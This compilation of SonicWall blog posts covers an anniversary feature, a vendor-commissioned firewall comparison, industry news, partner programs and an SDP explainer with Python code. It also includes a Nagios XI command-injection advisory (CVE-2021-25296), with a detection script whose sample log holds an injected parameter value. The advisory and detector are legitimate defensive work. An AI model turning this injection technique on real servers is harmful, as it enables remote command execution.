Celebrating Three Decades of Employee Excellence

When Sonic Systems entered the firewall market in 1996, the company had fewer than 40 employees. Today, the company we now know as SonicWall employs more than 1,600 people in 37 countries.

There are a number of unique benefits to choosing a career at SonicWall, including the chance to work on the cutting edge of cybersecurity. But while a great cybersecurity portfolio can attract top talent, it takes good leadership and a great corporate culture to keep them.

As we interviewed our employees in celebration of our 30th anniversary, four factors repeatedly emerged as integral to SonicWall’s culture: Opportunity, Family, Diversity and Philanthropy.

Opportunity

“At SonicWall, each of our people can advance their careers through hands-on experience and constant learning while receiving highly competitive compensation and rewards,” SonicWall Chief Administrative Officer Matt Neiderman said.

Ruby W., a SonicWall sales engineer (SE), agreed, citing her willingness to learn as key to both her career development and her ability to continue providing higher levels of customer service.

“Learn as much as you can: Security is ever-changing and you have to change, learn and grow with it,” Ruby said. “Keep up with the changing technology and teach your customers — they will appreciate you and trust you even more.”

Ruby was one of several employees who appreciated that their roles offered opportunities to hone their craft among groups of like-minded individuals. Another was Graphic Designer Mike B., who joined SonicWall in 2019.

“My experience at SonicWall has helped me develop as a designer and improved my career as a whole,” Mike said. “The team is the most skilled and professional group of individuals. Everyone is positive and focused on improving the company’s performance.”

This positive, team-oriented philosophy provides an environment ideally suited for helping employees succeed.

“My favorite thing about SonicWall is that everyone is dedicated to our Boundless Cybersecurity mission. This shared vision results in an amazing collaborative environment where everyone can make an impact,” said Terri O., VP of Marketing.

Family

Even among newer employees, many reported that the tight-knit environment felt more like a family than a group of co-workers.

“We have a good mix of hard-edged accountability and a warm, fuzzy, family-like atmosphere in our company,” said Senior Technical Lead John L.

This view wasn’t limited to just one or two departments, however. Social Media Manager Jamie L. credited her coworkers with creating an environment conducive to both professional and personal growth.

“I have loved my experience at SonicWall. It feels like a big family,” Jamie said. “Everyone that I have come into contact with is kind and willing to help me further my knowledge and help me grow.”

While employees enjoy SonicWall’s close-knit atmosphere, they also expressed appreciation for family-friendly policies such as flexible hours and remote work.

“Over the years, we have watched not only employees grow, but also their families. We all work very hard, but it’s knowing that my SonicWall family is behind me every day that makes it all worthwhile,” Sarah C., VP of Human Resources, said.

This support extends far beyond the daily 9-5. Several employees said their SonicWall family had been there to celebrate things like weddings or the arrival of a new baby, and had also lent their support during life’s challenges.

“A huge standout for me was when my son was diagnosed with cancer,” Tiffany H., Sr. Manager, Inside Sales, said. “I came back to the office and everyone was wearing green (the color for lymphoma) to show me that they were there to support me and my family.”

Diversity

SonicWall employees may all be working together toward a shared goal, but their varied experiences mean that each person brings to bear their own unique contribution. SonicWall has long focused on fostering an inclusive and equitable environment, and this begins with the recruiting and hiring processes.

“We are committed to hiring people from diverse backgrounds and cultures and providing each member of our team meaningful opportunities to contribute to the success of the company,” Neiderman said.

As a result, there is no “typical SonicWall employee” — the company prides itself on both bringing together a diverse group of employees in each of its offices, and on celebrating the different beliefs and values of all its employees.

For decades, SonicWall employees and their families have enjoyed celebrating holidays from across the world, as well as participating in special events with music, food, games, costumes, contests and more.

Due to SonicWall’s global presence, some roles offer an opportunity to experience other cultures more directly.

“I have enjoyed the travel opportunities I have been afforded during my time here at SonicWall,” said Technical Support Sr. Advisor David W. “I’ve been to India and South Korea to complete training and to support major customer deployments. Most of all, I really enjoy learning about different cultures and working with people from diverse backgrounds.”

Sr. Test Principal Engineer Keith C. agreed. “I love SonicWall’s diversity and the opportunity to work with people from all over the world,” he said.

Philanthropy

Senior Director of Demand Generation Diane W. summed up SonicWall’s approach to giving as such: “SonicWall thinks globally and acts locally.”

SonicWall offers employees several opportunities throughout the year to help make their communities a better place. Each December, offices support a local charity with donations — for example, the SonicWall headquarters in Milpitas, Calif., donates to the Second Harvest of Silicon Valley, while the Dallas office supports the North Texas Food Bank.

But while many of our charitable endeavors are built around the idea of “helping out at home,” employees are always willing to answer the call when disaster strikes — regardless of where it occurs.

In spring 2021, for example, India experienced a massive wave of severe COVID-19 infections. During this time of widespread suffering and loss of life, SonicWall employees worldwide came together with donations to help ease the hardship of both fellow employees and the area as a whole.

… and in return, Loyalty

“Our decades of working with channel partners to deliver scalable security solutions means that we are big enough to deliver cutting-edge and cost-effective technology, but small enough to never forget the value of the people behind our success,” Neiderman said.

This is reflected in the number of SonicWall employees who choose to spend their career at SonicWall. Out of 1,600 employees, there are 130 who have been with the company for 10-15 years, 67 employees who have spent 16-20 years working for SonicWall, and 16 who have spent over a fifth of a century with us.

During our 30th anniversary celebration, SonicWall wants to take the opportunity to thank our employees for their hard work and their dedication, but most of all, for their loyalty: Whether it’s your second day or your 20th year, your continued efforts at helping safeguard the world’s networks from cybercrime have helped make SonicWall the company it is today, and your contributions will continue to drive improvements on every front over the next 30 years.

SonicWall NSsp 15700 vs. Fortinet FG 3600E

Choosing between two leading enterprise firewalls

Legacy cybersecurity solutions are no match for today’s hyper-distributed businesses. Safeguarding against modern threats requires stronger secure gateways capable of protecting a radically redefined perimeter. To stay ahead of the evolving threats, it’s time for security professionals to embrace modern Next-Generation Firewalls (NGFW).

The firewalls of today are vastly more agile, more capable, and more powerful than when the technology debuted 20 years ago. But not all firewalls are created equal — they come in different form factors, network interfaces and security packages. These packages may or may not include services such as IPS, application control, content filtering, anti-malware, DNS security and cloud management. To further complicate matters, there are enough firewall vendors in the market today that it can be difficult for the average customer to choose the right solution for their environment.

In March 2021, SonicWall commissioned Tolly Group to compare SonicWall NSa 2700 with the Fortinet FG 100F — and their report showed the NSa 2700 is a better choice for medium enterprises. Then, in July 2021, Tolly Group compared the price and performance of two firewalls designed for larger enterprises — SonicWall’s NSsp 15700 to the Fortinet FG 3600E. The two firewalls have a similar form factor and are comparable from a single appliance price point.

When choosing the right security solution, there are three key considerations: price, performance and protection. The ideal choice is the device that costs the least while providing similar performance and a comparable or better feature set than the alternative. Tolly used the published numbers and prices from both vendors to calculate the Total Cost of Ownership (TCO) for a 3-year, High-Availability appliance model with comparable security features. The full report is here. Here are a few of the key findings:

SonicWall’s three-year TCO is less than half that of Fortinet

This report compares SonicWall’s NSsp 15700 Total Secure Essential Edition with Fortinet FG-3600E Unified Threat Protection, both configured in HA mode. The SonicWall solution has a significantly lower TCO mainly because SonicWall does not require the purchase of a firewall license for the second unit. At $885,000, the Fortinet FG 3600E 3-year TCO is more than two times the $440,200 price of the SonicWall NSsp 15700 (see Figure 1).

SonicWall’s advertised threat prevention throughput is more than 2.5 times that of Fortinet

When looking at product data sheets, it’s not uncommon to be overwhelmed with multiple performance numbers. When evaluating a security appliance, you should look for performance numbers that will most closely replicate how you will use the solution in your environment. In the case of a firewall, that number is usually threat protection/prevention with most security features turned on.

While the two firewalls have a similar form factor and price per appliance, SonicWall’s solution offers 80 Gbps threat prevention throughput, compared to Fortinet’s 30 Gbps.

SonicWall has a dramatically lower price-to-performance ratio

At the end of the day, what is most important to an organization is how much they have to spend to protect their environment while maximizing performance. For a firewall, that measure is commonly referred to as the price-to-performance ratio and is calculated by dividing the TCO by the relevant performance benchmark.

As detailed in Table 1, the cost of protecting each gigabit per second of network traffic for Fortinet ($29,500) is 5.5 times higher than SonicWall ($5,368).

Conclusion

Firewalls have different pricing, packages, performance, bells and whistles, which can make it difficult to choose between them. Given that a firewall purchase is a long-term investment, it is important to obtain and compare the three- to five-year total cost of ownership as opposed to just looking at list prices. It is clear that SonicWall firewalls, including both the NSa 2700 for medium enterprises and the NSsp 15700 for large enterprises, outperform comparable Fortinet firewalls at a lower total cost of ownership.

Nagios XI Configwizards Command Injection Vulnerability

Overview:

  Nagios is an open source host, service and network monitoring program. The product’s functionality is implemented through a number of server-side programs primarily written in PHP, with a backend database running MariaDB, a drop-in replacement for MySQL. The majority of these programs can be accessed only after successful authentication is performed with the underlying webserver. Nagios XI is a paid version of Nagios which offers greater functionality and performance than Nagios, such as enhanced dashboards, graphs and backend database support.

  A command injection vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient input validation of the requests submitted to windowswmi.inc.php.

  A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in arbitrary command execution with privileges of the web server on the target system.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-25296.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L/E:P/RL:O/RC:C).

  Base score is 7.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is low.
    • Impact of this vulnerability on data integrity is low.
    • Impact of this vulnerability on data availability is low.
  Temporal score is 6.7 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  Nagios XI facilitates the management of the tasks that monitor new devices, services, and applications via the Configuration Wizards feature. Configuration wizards are a set of modules which make it easy for end-users to set up monitoring tasks for various services or hosts through a user-friendly interface, without needing to understand how Nagios XI works in the backend. Several of these modules are installed by default in a Nagios XI installation. The “Windows WMI” module is one of these default modules and is the one relevant to this report. The Configuration Wizards feature can be accessed via the Request-URI

    /url_root/config/monitoringwizard.php

  where url_root is the URL root of the Nagios XI application.

  A command injection vulnerability exists in Nagios XI. When processing requests submitted to the monitoringwizard.php endpoint, monitoringwizard.php checks whether the value of the wizard request parameter is “windowswmi”. If so, it calls the function windowswmi_configwizard_func() in windowswmi.inc.php to process the request. windowswmi_configwizard_func() creates command-line strings that invoke the program check_wmi_plus.pl to perform various monitoring tasks. check_wmi_plus.pl accepts several command-line arguments; one of them is the “forcetruncateoutput” argument, which limits the length of the output printed by check_wmi_plus.pl. windowswmi_configwizard_func() checks whether the plugin_output_len request parameter exists in the HTTP request. If so, it applies the plugin_output_len value to the construction of the check_wmi_plus.pl command-line string as its “forcetruncateoutput” argument, like the command-line string shown below:

    check_wmi_plus.pl ...... --forcetruncateoutput plugin_output_len

  where plugin_output_len is the value of the plugin_output_len request parameter.

  Then, windowswmi_configwizard_func() runs the constructed check_wmi_plus.pl command-line string using the PHP exec() function.

  However, windowswmi_configwizard_func() does not sanitize the plugin_output_len parameter value before applying it to the command-line string. An attacker can include command injection characters in the value of the plugin_output_len parameter, and they are then included in the constructed command-line string. This allows the execution of arbitrary commands on the underlying system when windowswmi_configwizard_func() calls PHP exec() to run the command-line string.

  A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in the execution of arbitrary commands as the apache user.
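  A defender-side check for the condition described above, as an added example that is neither Nagios XI code nor SonicWall’s signature logic: since a legitimate “forcetruncateoutput” length can only be a plain integer, any request to monitoringwizard.php for the windowswmi wizard whose plugin_output_len value contains anything other than digits is flagged. The access-log lines are constructed, and the Apache combined log format is an assumption; parameters carried in a POST body are not visible in an access log and must be fed to the check from a WAF or request log instead.

```python
"""Flag Nagios XI monitoringwizard.php requests whose plugin_output_len
value could not be a valid --forcetruncateoutput length.  Added example;
the sample log lines are constructed and the log format is assumed to be
Apache 'combined'."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined format (assumption).  Only the client IP, timestamp and
# request target are used here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

WIZARD_PATH = "/config/monitoringwizard.php"  # preceded by the URL root


def is_suspicious_wizard_request(path, params):
    """params maps parameter name -> list of values (as parse_qs returns).
    Returns True when the windowswmi wizard is requested with a
    plugin_output_len value that is not purely numeric (an empty value is
    flagged too, since it cannot be a valid length)."""
    if not path.endswith(WIZARD_PATH):
        return False
    if "windowswmi" not in params.get("wizard", []):
        return False
    for value in params.get("plugin_output_len", []):
        if not re.fullmatch(r"[0-9]+", value):
            return True
    return False


def scan_access_log(lines):
    """Return (client_ip, timestamp, offending values) for each flagged
    request found in an iterable of access-log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable log line; skip rather than guess
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)
        if is_suspicious_wizard_request(url.path, params):
            findings.append((m["ip"], m["ts"], params["plugin_output_len"]))
    return findings


# Constructed sample lines: a benign numeric value, a value carrying a
# shell metacharacter (inert placeholder 'X' after the ';'), and an
# unrelated wizard that must not be flagged even with a bad value.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Aug/2021:10:00:01 +0000] "GET /nagiosxi/config/'
    'monitoringwizard.php?wizard=windowswmi&plugin_output_len=100 '
    'HTTP/1.1" 200 5120',
    '10.0.0.9 - - [27/Aug/2021:10:02:13 +0000] "GET /nagiosxi/config/'
    'monitoringwizard.php?wizard=windowswmi&plugin_output_len=100%3BX '
    'HTTP/1.1" 200 5120',
    '10.0.0.7 - - [27/Aug/2021:10:03:44 +0000] "GET /nagiosxi/config/'
    'monitoringwizard.php?wizard=examplewizard&plugin_output_len=abc '
    'HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, ts, values in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious plugin_output_len={values}")
```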

Triggering the Problem:

    • The target system must have the vulnerable product installed and running.
    • The attacker must have network connectivity to the affected ports.
    • The attacker must authenticate to the target system.

Triggering Conditions:

  The attacker authenticates and then sends an HTTP request containing maliciously crafted parameters to the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 80/TCP
    • HTTPS, over port 443/TCP

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 15480 Nagios XI monitoringwizard.php Command Injection 1
  • IPS: 15668 Nagios XI monitoringwizard.php Command Injection 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Blocking the affected ports from external network access if they are not required.
    • Filtering traffic based on the signatures above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released a patch (5.8.0) regarding this vulnerability:
  Vendor Advisory

Cybersecurity News & Trends – 08-27-21

The Mid-Year Update to the 2021 SonicWall Cyber Threat Report found its way into the Wall Street Journal, CNN and other news outlets. Plus, SonicWall’s big 30th anniversary earned mentions all over the global news cycle. In industry news, China crushes cyberweakness, Trickbot links, Blackberry’s “BadAlloc,” hackers attack rural sewage, surgeries cancelled, care diverted, and the Dallas Police Department announces a serious breach – four months late.


SonicWall in the News

SonicWall and Fusion BPO Services enter into strategic partnership — CRN India

  • SonicWall has entered into a strategic partnership with Fusion BPO services, a global BPO with headquarters in Kolkata, India and Draper, Utah (US). The new partnership will feature SonicWall’s state-of-the-art next-generation firewalls (NGFW) for SMB, enterprise, and government organizations. Fusion incorporates a wide range of call center services from 18 centers located in nine countries.

The Ruthless Hackers Behind Ransomware Attacks on U.S. Hospitals: ‘They Do Not Care’ — Wall Street Journal

  • The Mid-Year Update to the 2021 SonicWall Cyber Threat Report continues to reverberate, this time in the Wall Street Journal’s reporting on recent ransomware attacks on hospitals in the U.S. The attacks were devastating: a chain in Las Vegas was all but closed; in Oregon, they shut down monitors tracking patient vital signs; and in New York, they briefly closed a trauma center. In addition, the report notes that a cybercrime gang known as “Ryuk” may account for one-third of the 203 million U.S. ransomware attacks in 2020 cited in SonicWall’s report.

Friday 13: 5 tips to protect yourself from ‘bad luck’ from cyber attacks — CNN Brazil

  • CNN, one of Brazil’s most prominent news outlets, drew a parallel between superstitions associated with “Friday the 13th” and the specter of falling victim to a cyberattack. The reporter playfully warns that readers can avoid the “bad luck” of cyberattacks on a then-upcoming occurrence of the day by taking certain precautions. However, the story turns very serious when it quotes data from the Mid-Year Update to the 2021 SonicWall Cyber Threat Report.

Newest Target of Cyber Attacks: America’s Hospitals — The Crime Report

  • Reporters here cited the Mid-Year Update to the 2021 SonicWall Cyber Threat Report as a reference point for the massive surge in ransomware attacks in the U.S. The story also cited an Ars Technica report that describes how attackers knocked out staff access to I.T. systems across virtually all operations. The report also pointed out that the Ryuk cybercriminal gang was once called the “Business Club,” tied to Russian government security services.

Cyber threat warning to Fife businesses as attacks ‘skyrocket’ — Dunfermline Press

CISA offers government and private sector guidance on ransomware prevention — FinTech Global

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) shared guidance on how government and private sector organizations can work together to prevent ransomware data breaches. The story cited the 151% spike in ransomware attacks that was reported in the Mid-Year Update to the 2021 SonicWall Cyber Threat Report.

SonicWall: Record 304.7 Million Ransomware Attacks Eclipse 2020 Global Total in Just 6 Months — CRWE World

SonicWall: Record 304.7 Million Ransomware Attacks Eclipse 2020 Global Total in Just 6 Months — European Business Magazine

SonicWall: Record 304.7 Million Ransomware Attacks Eclipse 2020 Global Total in Just 6 Months — Digital Conqurer

SonicWall Cyber Threat Report 2021: 304.7 Million Record Ransomware Attacks In Just 6 Months, Eclipses Whole Of 2020 — SiliconVillage

SonicWall: Record 304.7 Million Ransomware Attacks Eclipse 2020 Global Total In Just 6 Months — MoneyFM

Ransomware was the most common attack among Brazilian companies in 2021 — Bahia Lighthouse

Ransomware was the most common attack among Brazilian companies in 2021 — InfoTec Computadores

Anniversary – 30 years of Sonicwall — Netzpalaver

  • The article notes SonicWall’s 30th anniversary to share its history, significant milestones, the growth of SonicWall technologies, and its commitment to its customers.

SonicWall turns 30: Cybersecurity pioneer celebrates three decades of innovation — All About SECURITY

  • This article also observes SonicWall’s 30th anniversary and shares comments from SonicWall President and CEO, Bill Conner, Exertis’ U.K. and Europe Security Sales Director, Jason Hill, Epicor’s I.T. Director of Hosting and Managed Services, Harry Hartnup, and SonicWall’s SVP and Chief Technology Officer, John Gmuender.

Sonicwall Turns 30: Cybersecurity Pioneer Celebrates Three Decades Of Innovation— SECURITY INSIDER

  • One more article celebrates SonicWall’s 30th anniversary, detailing SonicWall technologies and enduring customer loyalty.

Industry News

Crypto exchange Binance hires former U.S. Treasury criminal investigator — Reuters

  • Crypto exchange Binance says it appointed a former U.S. Treasury criminal investigator as its global money laundering reporting officer, part of an attempt by one of the world’s largest crypto exchanges to reinvent itself as a regulated financial firm.

China orders annual security reviews for all critical information infrastructure operators — The Register

  • China’s government has introduced rules for the protection of critical information infrastructure. The announcement, issued by the Cyberspace Administration of China (CAC), notes that the security challenges facing critical information infrastructure are severe.

Japanese insurer Tokio Marine discloses ransomware attack — Bleeping Computer

  • Tokio Marine Holdings, a multinational insurance holding company in Japan, announced this week that its Singapore branch, Tokio Marine Insurance Singapore (TMiS), suffered a ransomware attack.

Diavol ransomware sample shows stronger connection to TrickBot gang — Bleeping Computer

  • A new analysis of a Diavol ransomware sample shows a more apparent connection between the gang behind the TrickBot botnet and the evolution of the malware.

BlackBerry’s popular operating system for medical devices affected by critical vulnerabilities — Cyberscoop

  • A critical set of software flaws first revealed in April affects code made by BlackBerry used in countless devices in the medical, automotive and energy sectors, the technology vendor confirmed on Tuesday. The disclosure expands the number of devices at risk due to the “BadAlloc” flaw.

Rural Sewage Plants Hit by Ransomware Attacks in Maine — Security Week

  • Local officials said that a pair of ransomware attacks on sewage treatment plants in rural Maine communities demonstrates that small towns need to be just as vigilant as larger communities in protecting against hackers.

Colonial Pipeline sends breach letters to more than 5,000 after ransomware group accessed SSNs — ZDNet

  • Colonial Pipeline is sending out notification letters to 5,810 current and former employees whose personal information was accessed by the DarkSide ransomware group during an attack in May. The company admitted in an August 13 letter that on May 6, the ransomware group “acquired certain records” stored in their systems.

Malware campaign uses clever ‘captcha’ to bypass browser warning — Bleeping Computer

  • A malware campaign used a clever captcha prompt to trick users into bypassing browser warnings to download the Gozi (aka Ursnif) banking trojan. Yesterday, security researcher Malware Hunter Team shared a suspicious URL with BleepingComputer that downloads a file when attempting to watch an embedded YouTube video about a New Jersey women’s prison.

Brazilian government discloses National Treasury ransomware attack — Bleeping Computer

  • The Brazilian Ministry of Economy disclosed a ransomware attack that hit the National Treasury’s computing systems on Friday night, right before the start of the weekend. “On Friday night (the 13th) a ransomware attack on the internal network of the National Treasury Secretariat was identified,” the Brazilian government announced.

Tech Hack Notification Delays Can Leave Corporate Customers in the Lurch — The Wall Street Journal

  • Some tech companies are slow to share details about hacks of their products, leaving customers vulnerable to disruptions and uncertain how to respond as information trickles out. The story focuses on cyberattacks in which hackers target a service provider and then use that foothold to access its customers’ networks, and goes on to describe how policy makers in the U.S. and Europe are scrutinizing “weak links.”

T-Mobile Investigating Claims of Massive Customer Data Breach — VICE

  • T-Mobile says it is investigating a forum post claiming to be selling a mountain of personal data. The forum post itself doesn’t mention T-Mobile, but the seller told Motherboard they have obtained data related to over 100 million people and that the data came from T-Mobile servers.

Dallas cops lost 8 T.B. of criminal case data during bungled migration, says the DA… four months later — The Register

  • According to local reports, a bungled data migration of a network drive caused the deletion of 22 terabytes of information from a U.S. police force’s system – including case files in a murder trial. Dallas Police Department confessed to the information blunder last week, revealing in a statement that a data migration exercise carried out at the end of the 2020-21 financial year deleted vast amounts of data from a network drive.

Surgeries canceled, care diverted as Memorial Health responds to cyberattack — S.C. Magazine

  • Memorial Health System in Ohio is currently operating under electronic health record (EHR) downtime procedures and diverting emergency care patients after a cyberattack struck its network during the early hours of Sunday, Aug. 15. All radiology exams and urgent surgical cases scheduled for Aug. 16 have also been canceled as a result.

In Case You Missed It

SonicWall: 30 Years of Partnering to Win

SonicWall has always been 100% channel-driven. Today, we’re honored to work with more than 17,000 channel partners worldwide — but even before SonicWall was known as SonicWall, we were working to build partnerships based on trust, loyalty and mutual success.

As early as the mid-1990s, SonicWall (then known as Sonic Systems) had already begun onboarding top resellers, value-added resellers (VARs) and systems integrators. By seeking out partner companies that focused on providing educational institutions and SMBs with high-quality, affordable inter-networking solutions, Sonic Systems was able to achieve tremendous growth in a short amount of time. This growth, in turn, fueled innovations that helped our partners and their customers continue to succeed.

SonicWall Launches Partner Recognition Programs

In recognition of these successful partnerships, in the late 1990s a newly rebranded ‘SonicWALL’ began developing a dedicated partner program. By 2000, this program had five distinct partner program levels — Reseller, Silver, Gold, Platinum and International Distributors — that would later become the foundation of today’s SecureFirst Partner Program.

The partner structure SonicWall currently employs dates back to 2004, when the Medallion Program was launched. This program was refreshed in 2007 to coincide with the launch of SonicWall’s first partner portal, PartnerLink.

In recognition of the unique needs of its Managed Security Services Provider partners, SonicWall announced its first MSSP program in 2005. This program was designed to help its channel partners grow their share of the managed services market and signaled a recognition of these partners that continues to the present day.

Partnering for a Successful Future: Today’s Programs

SonicWall’s partner programs have evolved a great deal since their inception, and today’s programs are more comprehensive and offer more benefits than ever before.

“At SonicWall, we listen,” said HoJin Kim, SonicWall SVP, Worldwide Channel, North American Sales. “We work incredibly hard to provide partners with everything they need in order to not only meet their yearly objectives, but exceed them.”

SecureFirst Partner Program

In 2016, SonicWall introduced the SecureFirst partner program. In the first 150 days, more than 10,000 partners registered to sell within the new program — 20% of which were new to SonicWall. Within a year, the program had grown 500% as partners around the world jumped at the opportunity to reintroduce SonicWall products to their comprehensive offerings.

The program’s ongoing success is due largely to its philosophy of partnering to win. In addition to the program’s goal of accelerating partners’ ability to be thought leaders in the ever-evolving cybersecurity landscape, it also offers a number of perks. These include competitive margins, deal registration protection, technical training, sales enablement, marketing and lead-generation support, and more.

In recognition of our commitment to going above and beyond for our solution providers, in 2021 the SonicWall SecureFirst partner program received a 5-star rating in the 2021 CRN Partner Program Guide. This annual guide provides a conclusive list of the most distinguished partner programs from leading technology companies that provide products and services through the IT channel.

SonicWall University

SonicWall University, an online partner enablement platform designed to keep SecureFirst partner sales representatives, pre-sales and support engineers at the forefront of both cyberthreats and security solutions, was unveiled in 2017. This free, on-demand online training portal offers pathways for partners to earn SecureFirst Sales and Technical Accreditations that directly influence increased revenue attainment.

SonicWall MSSP Program

In 2020, SonicWall’s MSSP program was modernized to empower MSSPs with the resources and tools they need to protect their customers while improving operational efficiency and costs. In addition to branding and customization options, the new MSSP structure empowers SecureFirst partners to consume SonicWall services on either a monthly or annual basis, matching the way they do business.

SonicWall relies on its expansive base to fuel its momentum and is dedicated to continuing to grow programs like these to further meet the needs of our partners in the future.

As SonicWall moves into its third decade, we’d like to take this opportunity to thank our partners for their loyalty and commitment. It is both our mission and our privilege to continue working toward our mutual success in the years to come.

Why SDP Matters in Zero Trust

Today’s networks have never been more diverse and distributed. While the network and security used to operate within a physical perimeter, digital transformation has made the old castle-and-moat model of security largely insufficient to protect modern networks. Organizations have hardened their network perimeters with firewalls, VPNs and NACs, but as the network perimeter continues to change, these tools need to evolve as well.

Traditionally, users were allowed to “connect first, authenticate later.” Network security relied on application-level permissions for authorization, which gave users a pass into the network perimeter before any check took place. In today’s era of rising cybercrime, this implicit trust model puts organizations at risk and has enabled far too many successful breaches.

Modern networks need flexible and adaptive security in which the perimeter begins with the user. The SDP (software-defined perimeter) model is built around the idea of “authenticate first, connect later,” giving administrators fine-grained access control that is defined by policies and network parameters for each individual user.

SDP architectures include a minimum of five layers of security:

  • Authentication and validation of devices
  • Authentication and authorization of users
  • Two-way encrypted connections
  • Dynamic provisioning of connections
  • Mapping and control of connections to services, while keeping these connections hidden

SDP uses the single-packet authorization (SPA) protocol: before the gateway will accept any connection, the client must send one cryptographically authenticated packet that proves the user’s or device’s identity. Until that packet is verified, the gateway drops all other traffic, so unauthorized hosts cannot even see that the protected services exist, and resources are exposed only to authorized users on a need-to-know basis.

The SDP architecture is made up of three key components:

  • SDP Client: runs on the user’s device
  • SDP Controller: authentication gatekeeper that evaluates user, device and context against policy
  • SDP Gateway: trust broker that enforces the controller’s decision and provides secure access to resources

A connection is established in five steps:

  1. The SDP client sends an access request to the SDP controller. The controller evaluates the credentials and authenticates the client according to the access policies.
  2. The SDP controller checks the context and passes the client its individual network entitlement, along with a signed token for the authorized network resources.
  3. The SDP client presents the entitlement to the SDP gateway, which uses it to match the requested applications to the user’s context.
  4. A dynamic network segment is created from the SDP client, through an encrypted tunnel to the SDP gateway, to the resource or service.
  5. The end-to-end network segment is continuously monitored for context changes and re-evaluated against policy for as long as it exists.
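The following added example, which is not SonicWall code, models the SPA knock and the controller/gateway exchange described above in one Python script: the controller authenticates the user and the device before issuing a signed entitlement, the gateway drops everything until a valid SPA packet arrives, and it then brokers only the services the entitlement names. The keys, user and device records, posture check and service names are constructed; the token format (base64 JSON claims plus an HMAC) and the SPA packet layout are simplifications chosen for the example rather than the wire format of any real SDP product.

```python
"""Added example of the SDP exchange: Controller authenticates user and device and
issues a signed entitlement; Gateway stays dark until a valid SPA knock arrives and
then brokers only the services in the entitlement. All keys, users, devices and
services below are constructed for the example."""
import base64
import hashlib
import hmac
import json
import secrets
import time


def _sign(key, msg):
    return hmac.new(key, msg, hashlib.sha256).digest()


class Controller:
    """Authentication gatekeeper: 'authenticate first' happens here."""

    def __init__(self, token_key, users, devices, policy, ttl=300):
        self.token_key, self.users, self.devices = token_key, users, devices
        self.policy, self.ttl = policy, ttl

    def authenticate(self, user, password, device_id, posture):
        """Returns a signed entitlement token, or None if user, device or posture fails."""
        rec = self.users.get(user)
        if rec is None:
            return None
        salt, expected = rec
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)
        if not hmac.compare_digest(digest, expected):
            return None                                   # wrong credential
        if self.devices.get(device_id) != user or not posture.get("disk_encrypted"):
            return None                                   # device not enrolled to this user, or fails posture
        claims = {"sub": user, "dev": device_id,
                  "svc": sorted(self.policy.get(user, [])),  # the user's network entitlement
                  "exp": int(time.time()) + self.ttl}
        body = base64.urlsafe_b64encode(json.dumps(claims).encode())
        return (body + b"." + base64.urlsafe_b64encode(_sign(self.token_key, body))).decode()


class Gateway:
    """Trust broker on the data plane: default deny, SPA knock, then token check."""

    def __init__(self, spa_key, token_key, window=30):
        self.spa_key, self.token_key, self.window = spa_key, token_key, window
        self.seen_nonces = set()                          # replay protection for SPA knocks

    def verify_spa(self, packet, now=None):
        now = time.time() if now is None else now
        try:
            msg = "{dev}|{ts}|{nonce}".format(**packet).encode()
            mac = bytes.fromhex(packet["mac"])
            ts = int(packet["ts"])
        except (KeyError, ValueError, TypeError):
            return False
        if not hmac.compare_digest(_sign(self.spa_key, msg), mac):
            return False                                  # forged or tampered knock: stay dark
        if abs(now - ts) > self.window or packet["nonce"] in self.seen_nonces:
            return False                                  # stale or replayed knock
        self.seen_nonces.add(packet["nonce"])
        return True

    def connect(self, token, service, now=None):
        """Opens the segment only for a service the controller's token lists."""
        now = time.time() if now is None else now
        try:
            body, sig = token.encode().split(b".", 1)
            sig = base64.urlsafe_b64decode(sig)
        except ValueError:
            return False
        if not hmac.compare_digest(_sign(self.token_key, body), sig):
            return False                                  # entitlement not issued by our controller
        claims = json.loads(base64.urlsafe_b64decode(body))
        return claims["exp"] > now and service in claims["svc"]


def make_spa(spa_key, device_id, now=None):
    """Client side: the single authenticated packet that precedes any connection."""
    ts = int(time.time()) if now is None else int(now)
    nonce = secrets.token_hex(8)
    mac = _sign(spa_key, "{}|{}|{}".format(device_id, ts, nonce).encode()).hex()
    return {"dev": device_id, "ts": ts, "nonce": nonce, "mac": mac}


# Constructed data: one enrolled user, one enrolled device, one entitled service.
TOKEN_KEY, SPA_KEY = b"controller-token-key", b"gateway-spa-key"
_SALT = b"example-salt"
USERS = {"alice": (_SALT, hashlib.pbkdf2_hmac("sha256", b"correct horse", _SALT, 50_000))}
DEVICES = {"laptop-7f3a": "alice"}
POLICY = {"alice": ["git.internal:22"]}


def demo():
    """Runs the happy path and the denials a practitioner would want to see."""
    ctl = Controller(TOKEN_KEY, USERS, DEVICES, POLICY)
    gw = Gateway(SPA_KEY, TOKEN_KEY)
    good = {"disk_encrypted": True}
    token = ctl.authenticate("alice", "correct horse", "laptop-7f3a", good)
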